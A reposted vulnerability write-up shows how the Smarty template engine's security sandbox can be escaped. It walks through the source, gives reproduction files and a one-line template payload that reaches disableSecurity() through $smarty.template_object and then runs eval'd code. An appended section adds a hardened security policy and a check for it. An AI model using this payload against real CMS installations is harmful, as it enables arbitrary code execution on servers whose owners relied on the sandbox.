
0x00
The Smarty template engine is embedded in the CMS, and by default the CMS enables sandbox mode (enableSecurity), so PHP functions cannot be executed from .tpl templates.
0x01
The official note says template_object must not be returned in sandbox mode. Searching the source turns up:
case 'template_object':return '$_smarty_tpl';
It returns $_smarty_tpl, which is an instance of the Smarty_Internal_Template class:

class Smarty_Internal_Template extends Smarty_Internal_TemplateBase
{
    public $smarty = null;

    public function __construct($template_resource, Smarty $smarty, Smarty_Internal_Data $_parent = null,
                                $_cache_id = null, $_compile_id = null, $_caching = null,
                                $_cache_lifetime = null, $_isConfig = false)
    {
        $this->smarty = $smarty;
        // ...
Its $smarty property holds the Smarty object:

class Smarty extends Smarty_Internal_TemplateBase
{
    public function enableSecurity($security_class = null)
    {
        Smarty_Security::enableSecurity($this, $security_class);
        return $this;
    }

    public function disableSecurity()
    {
        $this->security_policy = null;
        return $this;
    }
    // ...
The methods that enable and disable the sandbox sit in that same Smarty class, so a template that reaches the Smarty object can call disableSecurity() and then the parent class's display() to execute arbitrary code:

abstract class Smarty_Internal_TemplateBase extends Smarty_Internal_Data
{
    public function display($template = null, $cache_id = null, $compile_id = null, $parent = null)
    {
        // ...
Reproduction:
smarty.inc.php
<?php
define('ROOT_PATH', dirname(__FILE__) . '/');
require_once ROOT_PATH . 'smarty/Smarty.class.php';

class security extends Smarty_Security
{
    // disable all PHP functions
    public $php_functions = null;
    public $php_handling = Smarty::PHP_REMOVE;
    public $modifiers = array();
}

$_smarty = new Smarty();
$_smarty->enableSecurity('security'); // enable the sandbox
$_smarty->template_dir = './template/';
$_smarty->compile_dir = './template_c/';
$_smarty->config_dir = './config/';
$_smarty->cache_dir = './cache/';
$_smarty->left_delimiter = '{';
test.php
<?php
require_once 'smarty.inc.php';
$_smarty->display('index.tpl');
index.tpl
{phpinfo()}
Because the sandbox is enabled, running it produces the following error:
"{phpinfo()}" PHP function 'phpinfo' not allowed by security setting
The following payload turns the sandbox off and then executes:
{$smarty.template_object->smarty->disableSecurity()->display('eval:{phpinfo()}')}
Note: exploitation requires permission to edit .tpl templates.
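The mitigation side, as an added example that is not part of the original post: a Smarty_Security subclass that refuses $smarty.template_object while security is on, plus a check that the policy really takes effect on the installed Smarty. It assumes Smarty 3.1.x, its Smarty_Security::$disabled_special_smarty_vars property and the eval: resource; the directory paths and class name are placeholders.

```php
<?php
// Added example, not code from the original post: harden the Smarty sandbox so
// that {$smarty.template_object} is refused at compile time, then verify it.
// Assumes Smarty 3.1.x and Smarty_Security::$disabled_special_smarty_vars;
// the paths below are placeholders.
require_once __DIR__ . '/smarty/Smarty.class.php';

class HardenedSecurity extends Smarty_Security
{
    public $php_handling  = Smarty::PHP_REMOVE;
    // null, not array(): an empty array means "every PHP function allowed".
    public $php_functions = null;
    public $php_modifiers = null;
    public $allow_php_tag = false;
    // template_object hands the template a Smarty_Internal_Template whose
    // ->smarty property exposes disableSecurity(); refuse the variable outright.
    public $disabled_special_smarty_vars = array('template_object');
}

// true  : the compiler rejects any template touching $smarty.template_object
// false : the sandbox still hands the object out (policy ignored by this version)
function sandboxRejectsTemplateObject(Smarty $smarty)
{
    try {
        // Constructed probe: only assigns the special variable, executes nothing.
        $smarty->fetch('eval:{assign var="probe" value=$smarty.template_object}');
    } catch (SmartyException $e) {
        // "special variable '$smarty.template_object' not allowed by security setting"
        return true;
    }
    return false;
}

$smarty = new Smarty();
$smarty->setTemplateDir(__DIR__ . '/template/');
$smarty->setCompileDir(__DIR__ . '/template_c/');
$smarty->enableSecurity('HardenedSecurity');

if (!sandboxRejectsTemplateObject($smarty)) {
    // The installed Smarty ignores the policy: upgrade it. Later 3.1 releases
    // refuse template_object in secure mode regardless of the policy class.
    fwrite(STDERR, "template_object still reachable under security\n");
    exit(1);
}
echo "sandbox refuses template_object\n";
```

Run it once after deployment and again after every Smarty upgrade; a false result means template editors can still reach disableSecurity() through the chain shown above.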
This article is reposted from 8ypass. If it is suspected of infringing copyright, please send an email to contact@modb.pro to report it, with supporting evidence; once verified, Modb (墨天轮) will remove the content immediately.